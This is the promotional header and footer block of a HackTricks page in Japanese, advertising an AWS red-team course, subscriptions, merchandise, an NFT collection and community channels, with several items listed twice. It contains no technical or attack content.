<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)でゼロからヒーローまでAWSハッキングを学ぶ</strong></summary>
- **サイバーセキュリティ企業で働いていますか?** HackTricksで**会社を宣伝**したいですか?または、**PEASSの最新バージョンやHackTricksのPDFをダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
HackTricksをサポートする他の方法:
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加する**、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有する。
- [**公式のPEASSHackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう。
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**
</details>